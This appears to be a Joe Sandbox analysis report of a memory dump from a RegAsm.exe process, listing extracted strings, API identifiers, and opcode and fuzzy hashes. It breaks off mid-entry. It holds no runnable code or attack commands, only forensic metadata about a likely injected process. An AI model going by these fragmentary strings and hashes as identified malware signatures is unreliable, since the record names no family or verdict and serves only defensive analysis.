                                                                                          • 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081, xrefs: 0042C156
                                                                                          • 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 0042C049
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081$00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$3
                                                                                          • API String ID: 0-3148958432
                                                                                          • Opcode ID: 76d337521e27f31ee896f162a7771935c3c337463d7ce85cdc9efd7ac2b9d2b6
                                                                                          • Instruction ID: ce7b78704aec23f0f100b9c5f8250c37d1e0dc14a04cd823a941762529791c0f
                                                                                          • Opcode Fuzzy Hash: 76d337521e27f31ee896f162a7771935c3c337463d7ce85cdc9efd7ac2b9d2b6
                                                                                          • Instruction Fuzzy Hash: 20812A23749AB087D324853D6C9137A7A824F92330F7DC76ED9F6873E2D56E88068349
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: D$`
                                                                                          • API String ID: 0-881360112
                                                                                          • Opcode ID: 8f753543ea90e0474693d28ee7daf32d0c6d28c2cd7facae0d5b7a5c7f9fa07f
                                                                                          • Instruction ID: a12b3458c38a0da20742625e017f099cdbf304783a8daeea1d5de12b955e1c34
                                                                                          • Opcode Fuzzy Hash: 8f753543ea90e0474693d28ee7daf32d0c6d28c2cd7facae0d5b7a5c7f9fa07f
                                                                                          • Instruction Fuzzy Hash: 3A134770508B808FC324DF38C5453A6BFE1AF56314F188A6ED4EA8B3D2D77AA446C756
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `Qn_$dUbS$ejkh
                                                                                          • API String ID: 0-3607805150
                                                                                          • Opcode ID: 501958d84d1f89c3f33867aaf9a00a34fc4396fa0d9e80ff9ad53ff5c881b2ba
                                                                                          • Instruction ID: c6147338adbbdd16a4a334053693c82bc98a5b2cc369ec1dee11409b88a7765c
                                                                                          • Opcode Fuzzy Hash: 501958d84d1f89c3f33867aaf9a00a34fc4396fa0d9e80ff9ad53ff5c881b2ba
                                                                                          • Instruction Fuzzy Hash: 63221876A00215CFCB14CF68D890AAEB7B2FF8A304F5980AAD445AB365DB359D43CB54
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: )$)$IEND
                                                                                          • API String ID: 0-588110143
                                                                                          • Opcode ID: ef92669c76779e70e88f96f76ab89203e784d509963e00b17a2859f219225626
                                                                                          • Instruction ID: 502fb94a4a8c323d6ce947db1c2c875e9dafe8a0d68cfc94dacaa3be1783068d
                                                                                          • Opcode Fuzzy Hash: ef92669c76779e70e88f96f76ab89203e784d509963e00b17a2859f219225626
                                                                                          • Instruction Fuzzy Hash: A2F1F2B1A087019BD314DF29D85172BBBE0BB94304F04463EFA95A73C2D778E914CB8A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ?B$$%$T9X;
                                                                                          • API String ID: 0-4026821037
                                                                                          • Opcode ID: 6060bafb5a909b3851e0021a20ac30dbf6704356a207e2280a7b2f71a9cc2b71
                                                                                          • Instruction ID: 7c6a79a51ead1f986ee90ea4a284e2ed8de9d0399f8d4ffa68c8e55ed59c13ce
                                                                                          • Opcode Fuzzy Hash: 6060bafb5a909b3851e0021a20ac30dbf6704356a207e2280a7b2f71a9cc2b71
                                                                                          • Instruction Fuzzy Hash: 238120B16083518BC714CF15E89136BB7F1EF85715F488A2CE4C68B351E778CA08CB4A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "2C$%*+($%*+(
                                                                                          • API String ID: 0-2122309569
                                                                                          • Opcode ID: 91297ddd3115418d97f9fe9c8326cf10708d82d549646a3d13fe90bd2db10ff1
                                                                                          • Instruction ID: bc8855bd4006f7e4ba690c8aae72be736675e13ee23e4fd9b8df305fc48d6a10
                                                                                          • Opcode Fuzzy Hash: 91297ddd3115418d97f9fe9c8326cf10708d82d549646a3d13fe90bd2db10ff1
                                                                                          • Instruction Fuzzy Hash: 22513171208300EFE7149F29E851B2B73E1EBDA705F15983DE6C987282DB788901CB5A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $ $ecA$"!
                                                                                          • API String ID: 0-3364350613
                                                                                          • Opcode ID: 5146b2c82354623d605cc78332edba79ca46a49caa252a72dd7de7166de8602c
                                                                                          • Instruction ID: a84adfe56098dfde3d8e2519e31f0818933c42745ba3a8db182c73bf23064917
                                                                                          • Opcode Fuzzy Hash: 5146b2c82354623d605cc78332edba79ca46a49caa252a72dd7de7166de8602c
                                                                                          • Instruction Fuzzy Hash: 66319F62B187808FD7348A6488913DFB7E1EBD6220F18493D95C897392D379444ADB47
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocString
                                                                                          • String ID: 0
                                                                                          • API String ID: 2525500382-4108050209
                                                                                          • Opcode ID: 8d9fdf9cd23c1dd14dede5f80195176d81aba0a38e9b96bb77c966aa0ec2965c
                                                                                          • Instruction ID: 9b617e75a7e927146c46d14a4011cccbd2e71a22201979af12b7a2fbf15f57d1
                                                                                          • Opcode Fuzzy Hash: 8d9fdf9cd23c1dd14dede5f80195176d81aba0a38e9b96bb77c966aa0ec2965c
                                                                                          • Instruction Fuzzy Hash: 2291F661508BC18ED326CB3C8888315BF915B6B228F6887DDD1E94F7E3C26AD507C766
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ! <&$4$&*
                                                                                          • API String ID: 0-1491766249
                                                                                          • Opcode ID: 66ca1c5eff0b8a5db1f344665fd271107b31af135dedfd2d29c9abebacfbf4a6
                                                                                          • Instruction ID: 73f779976201de485cc298f6299d0ecf36237185142a5650bb55855f8bd5da74
                                                                                          • Opcode Fuzzy Hash: 66ca1c5eff0b8a5db1f344665fd271107b31af135dedfd2d29c9abebacfbf4a6
                                                                                          • Instruction Fuzzy Hash: 0C525670505B408FC735CF39C4906A7BBE1BF46314B188A6ED4E68BB92C738E846CB56
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: :?A$ejkh
                                                                                          • API String ID: 0-1402537899
                                                                                          • Opcode ID: 9c0bde013dd6f916255a110b857c79c4418f67362c6589ee1e7f930342b12ca2
                                                                                          • Instruction ID: 90a2395316b79328b80d1edc6c30b531a8d8ea676b640ac94b0649158399f333
                                                                                          • Opcode Fuzzy Hash: 9c0bde013dd6f916255a110b857c79c4418f67362c6589ee1e7f930342b12ca2
                                                                                          • Instruction Fuzzy Hash: 29E133742493408BE7209F15D881BEB77E1FFC6315F04496DE4898B3A2E7788A41CB9A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 45$~9R7
                                                                                          • API String ID: 0-836555404
                                                                                          • Opcode ID: fa0b0923aa77ec7c0bce8498da90a2ac051695083cd5faf4f4d99f48298635a8
                                                                                          • Instruction ID: ad4dc7a0aa512fc83ae058ab161b0f672087832ee79a4ef236db8d9d1df9ceb2
                                                                                          • Opcode Fuzzy Hash: fa0b0923aa77ec7c0bce8498da90a2ac051695083cd5faf4f4d99f48298635a8
                                                                                          • Instruction Fuzzy Hash: 1EE1057A518222CBC7149F38D852367B7E2FF8A351F0B8879D8818B6A4E77DC9508785
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Y`Pb$yVh]
                                                                                          • API String ID: 0-2084830440
                                                                                          • Opcode ID: aee7aae619faeb57e78649503bdfdf56a5258b4be4529d21e7937fc3b90a49ea
                                                                                          • Instruction ID: c7a8bce0301616f152d507d51aa2e55fc555080e95b96159c47b034a264a4de2
                                                                                          • Opcode Fuzzy Hash: aee7aae619faeb57e78649503bdfdf56a5258b4be4529d21e7937fc3b90a49ea
                                                                                          • Instruction Fuzzy Hash: 24C18C327483618FD714CA2894412EBBBE2DFB6350F48866FE485873A2D33DD946D35A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: #"=$ejkh
                                                                                          • API String ID: 0-1264473211
                                                                                          • Opcode ID: a46293030c50fb474ed6e89541f734b865b6eeb3798e11c74ae46b5b1b41ae25
                                                                                          • Instruction ID: 2532d6325f9ddb8c0f470edd802daaa4d380036ac41fe73ef2749a7e7db08eb1
                                                                                          • Opcode Fuzzy Hash: a46293030c50fb474ed6e89541f734b865b6eeb3798e11c74ae46b5b1b41ae25
                                                                                          • Instruction Fuzzy Hash: 22B128B2D083108BD710DB24C8527AB77E1EF81364F19892DE8C69B381E73D9D81C79A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: B9A$ejkh
                                                                                          • API String ID: 0-1341962420
                                                                                          • Opcode ID: 0c80afbbee87331d74cb0a7c00c466413c88a830813c499dfc4fb91b31bb7a3c
                                                                                          • Instruction ID: 54f147c4b7cd38473d96433dd755f9f4254bbccbbeb24e47315024ccdde8b396
                                                                                          • Opcode Fuzzy Hash: 0c80afbbee87331d74cb0a7c00c466413c88a830813c499dfc4fb91b31bb7a3c
                                                                                          • Instruction Fuzzy Hash: 45A119B5900205CBCB10DF18CC926FB73B0FF55365F19416EE856AB3A1E778AA41C7A8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: U'y!$X;e5
                                                                                          • API String ID: 0-3296774026
                                                                                          • Opcode ID: b6e0189e1502e534b62590137653bd5c2d5c92e956156878abde7ba7129155cb
                                                                                          • Instruction ID: 8e4d150e7c196ad40219415c3b81a7ab5a2e006976dfd0b3990fea51ddd4897c
                                                                                          • Opcode Fuzzy Hash: b6e0189e1502e534b62590137653bd5c2d5c92e956156878abde7ba7129155cb
                                                                                          • Instruction Fuzzy Hash: 31A1CEB15083018BC7249F24C8916BBB7F1FF91364F188A1EE8D59B390EB38D985C796
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Uqrs$}K
                                                                                          • API String ID: 0-960693024
                                                                                          • Opcode ID: 7406f14f5ce95ecc2b780525cbea17e76877f92d1144a6dbb84d135db62627ba
                                                                                          • Instruction ID: beb5d8cd585f8ded2b0967c1a90115b3ce27acd002a283219496f90f71e2bb8a
                                                                                          • Opcode Fuzzy Hash: 7406f14f5ce95ecc2b780525cbea17e76877f92d1144a6dbb84d135db62627ba
                                                                                          • Instruction Fuzzy Hash: 6171E4715083658FD720CF69C85075FBBE1EBD5304F01892DE9E99B381D7B8894A8BC2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: x$z
                                                                                          • API String ID: 0-3420993086
                                                                                          • Opcode ID: bb5595b4462b27ea4952cb37dbecaccdfdf7b9205afeba6d39a69317d5e507fc
                                                                                          • Instruction ID: 5740a7024d2e97f291b9226dca0dcdd631566711d7bfd2cecd917f2ec36505b4
                                                                                          • Opcode Fuzzy Hash: bb5595b4462b27ea4952cb37dbecaccdfdf7b9205afeba6d39a69317d5e507fc
                                                                                          • Instruction Fuzzy Hash: F751F7716093508BC720DF24C8917ABBBE1EFC2358F09896DE4C99B392E77D8845C796
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: GDB$HI
                                                                                          • API String ID: 0-924133197
                                                                                          • Opcode ID: 312d50545c79561cee049e7d07627f7c68de33992084b31aa273948d4be1ac57
                                                                                          • Instruction ID: 3e362e029a777e99a33f7eb5e6b5413ea0a62eb7512e086428ad90f4c42d2eb7
                                                                                          • Opcode Fuzzy Hash: 312d50545c79561cee049e7d07627f7c68de33992084b31aa273948d4be1ac57
                                                                                          • Instruction Fuzzy Hash: 0441C8B46083048AD710DF18D85276BB7F1FF82B15F44891DE4C18B3A2E7789A46DB8A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %*+(${(B
                                                                                          • API String ID: 0-2446882167
                                                                                          • Opcode ID: 4fbd0a18541c03a9834103b375684cc96d19282d632b5201d9be0f667c652aa1
                                                                                          • Instruction ID: 9ed6c502bb5bcacd76bb72d85002f139ec9cb5799aac8db208ab619654bd1abf
                                                                                          • Opcode Fuzzy Hash: 4fbd0a18541c03a9834103b375684cc96d19282d632b5201d9be0f667c652aa1
                                                                                          • Instruction Fuzzy Hash: 4221F6347083109BD7288F14A891B3FB772EB66714FA4151ED4C213266C77A9D429B99
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %*+($GDB
                                                                                          • API String ID: 0-1977699624
                                                                                          • Opcode ID: 2c94b1521b92dd58b57d338e5d478f19ea3e17571f102e190785b8f49c99f7c6
                                                                                          • Instruction ID: ab2e02ce39b44dbe08f6447f4e6e81902e6d609775471c88f49bb3e938c5a44c
                                                                                          • Opcode Fuzzy Hash: 2c94b1521b92dd58b57d338e5d478f19ea3e17571f102e190785b8f49c99f7c6
                                                                                          • Instruction Fuzzy Hash: CD0108306083108BD7149F04E88023FF7B1EBC7724F998A2ED98513766C635AC41CB89
                                                                                          APIs
                                                                                          • CoCreateInstance.OLE32(0043E5B0,00000000,00000001,0043E5A0), ref: 0041D549
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateInstance
                                                                                          • String ID:
                                                                                          • API String ID: 542301482-0
                                                                                          • Opcode ID: f6442b77d05a10f0dc61e5b07bdcf6f6f71e3830d9c0246162d0d2b1237c8cc4
                                                                                          • Instruction ID: 1914b1fedddb10cc3e03e362cd83de3ab0f5152d55b2ed43a119f0fc65bb9354
                                                                                          • Opcode Fuzzy Hash: f6442b77d05a10f0dc61e5b07bdcf6f6f71e3830d9c0246162d0d2b1237c8cc4
                                                                                          • Instruction Fuzzy Hash: 1D51BFF1A00214ABDB209B24CC86BA733B5EF85768F044559F989CB3D0F379E841C76A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "
                                                                                          • API String ID: 0-123907689
                                                                                          • Opcode ID: 41896febff51d4481664b0afe96819ff128c830c87e8350aae1a99de3f771de3
                                                                                          • Instruction ID: 76cc21310578ec4794ec446908fb09bc8cb9ac5a68d45c7720bd89138e75de02
                                                                                          • Opcode Fuzzy Hash: 41896febff51d4481664b0afe96819ff128c830c87e8350aae1a99de3f771de3
                                                                                          • Instruction Fuzzy Hash: 99C126B2B04B209BD710CF25E44576BBBE9AF84314F98892FE4958B381E738DC45C796
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitVariant
                                                                                          • String ID:
                                                                                          • API String ID: 1927566239-0
                                                                                          • Opcode ID: 820674285889d5b9cc5526b676f8678555ec464e862a06bd4dca39440985cb36
                                                                                          • Instruction ID: dfca41d99a07de678be96dc9475a608ec3de281ec1156f1ac370d2784b1d5df3
                                                                                          • Opcode Fuzzy Hash: 820674285889d5b9cc5526b676f8678555ec464e862a06bd4dca39440985cb36
                                                                                          • Instruction Fuzzy Hash: D251BF22208B818FDB15CE7C88C8352BFD26BA6224F1DC2ADC5A58F3D7D678D406C365
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: r5B
                                                                                          • API String ID: 0-2463598374
                                                                                          • Opcode ID: 5c2cf3118bd35b072a17dd7806aecda8a97d3cf31ca866a3646d4cf68c5b3747
                                                                                          • Instruction ID: bb61186b569d582f44b88edbabb621aaad6f1f8181f98328a29c1b5cb013e79f
                                                                                          • Opcode Fuzzy Hash: 5c2cf3118bd35b072a17dd7806aecda8a97d3cf31ca866a3646d4cf68c5b3747
                                                                                          • Instruction Fuzzy Hash: FF914632A08391DFD324CF28E81036AB7E2AF86315F99866DF4D54B2E1C7789A458B45
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: /
                                                                                          • API String ID: 0-2043925204
                                                                                          • Opcode ID: d39ecc9714537fae3ce85a9280815870aead32280d49a367cd292518a5ba9a5d
                                                                                          • Instruction ID: e361dcbe4f2f6cafda4759637c7167deace8efae682d5cc05930c4cac5b47c4a
                                                                                          • Opcode Fuzzy Hash: d39ecc9714537fae3ce85a9280815870aead32280d49a367cd292518a5ba9a5d
                                                                                          • Instruction Fuzzy Hash: 66A1F77160D3925FC315CE28C45022FBBE2AFD9314F1AC66EE4E587356D638D806CB56
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: *3
                                                                                          • API String ID: 0-2439167937
                                                                                          • Opcode ID: c59a185b21e1ca09b6ac5ea20017262e8dd844b0b4f64bacda963e66611fdb88
                                                                                          • Instruction ID: 9ac632d882f7d23b0d0ce1808261d5d66565db40cd4b7a0671b4ae8e25b6cf88
                                                                                          • Opcode Fuzzy Hash: c59a185b21e1ca09b6ac5ea20017262e8dd844b0b4f64bacda963e66611fdb88
                                                                                          • Instruction Fuzzy Hash: 1271F13154D3C28BD3118F3988A076BFFE1AF96304F18466EE4D55B382D37A890ACB56
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ,
                                                                                          • API String ID: 0-3772416878
                                                                                          • Opcode ID: 60c6846c18b919789dfa1b8adb5b8b26ee77c837604559f37d5cd9c942d6175d
                                                                                          • Instruction ID: fa0a4f3f6d847ea971c5452c774b7193434d8be2fdbd908acda8a5e3aa5e6316
                                                                                          • Opcode Fuzzy Hash: 60c6846c18b919789dfa1b8adb5b8b26ee77c837604559f37d5cd9c942d6175d
                                                                                          • Instruction Fuzzy Hash: FFB148701093819FC321DF58C98061BFBE0AFA9708F444A6EF5D997382D635E918CBA7
                                                                                          Strings
                                                                                          • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 00419C81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
                                                                                          • API String ID: 0-442858466
                                                                                          • Opcode ID: efb475dcf81fa2a88cbc8ca51332c19ca3812a5d8363f7ee4a4f037011ab74a1
                                                                                          • Instruction ID: e83694575c5b0182850c64e511250849f00d0890019c77625b3fd3868af26c12
                                                                                          • Opcode Fuzzy Hash: efb475dcf81fa2a88cbc8ca51332c19ca3812a5d8363f7ee4a4f037011ab74a1
                                                                                          • Instruction Fuzzy Hash: 6071F636749A8147D728993C9C723FA7A835B92334F2C872FE6B38B3E1E5594C815345
                                                                                          Strings
                                                                                          • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 0042DA61
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
                                                                                          • API String ID: 0-442858466
                                                                                          • Opcode ID: 2d46158e68a92680f280f2b1f3b704b3229a311a03ecd2cde4e0acb4100f3bda
                                                                                          • Instruction ID: 3426d65016c810099368c1e5f8d4e6c626674790daecdfdd951b1ca3ad4bb295
                                                                                          • Opcode Fuzzy Hash: 2d46158e68a92680f280f2b1f3b704b3229a311a03ecd2cde4e0acb4100f3bda
                                                                                          • Instruction Fuzzy Hash: D9710633F1A5A147C7188D3D6C512AAAE531BE6330B7E837BE5B58B3D5C92C88034359
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: %*+(
                                                                                          • API String ID: 2994545307-3233224373
                                                                                          • Opcode ID: 10e8f7cc9f11839c291b648945f9158d3d083ed9b0a2a2cdd212f36a4858ca0d
                                                                                          • Instruction ID: f80ccb29b91bc570a4744049b6f6bf43882bb4efb87622969d7d299c471fa76c
                                                                                          • Opcode Fuzzy Hash: 10e8f7cc9f11839c291b648945f9158d3d083ed9b0a2a2cdd212f36a4858ca0d
                                                                                          • Instruction Fuzzy Hash: A5516D31A05700DBC7249F28C88076BF7E2EBCA724F69E92ED89497362D735DC118799
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @TB=
                                                                                          • API String ID: 0-1271029979
                                                                                          • Opcode ID: ad0bdd84afe2bb71d414c483e04ae00dafa2aa61afb500ccdc1217782849b9e6
                                                                                          • Instruction ID: 408a3de9d370c47e19351de5f2f3a087956215f128b9baa0279489e8eab9355f
                                                                                          • Opcode Fuzzy Hash: ad0bdd84afe2bb71d414c483e04ae00dafa2aa61afb500ccdc1217782849b9e6
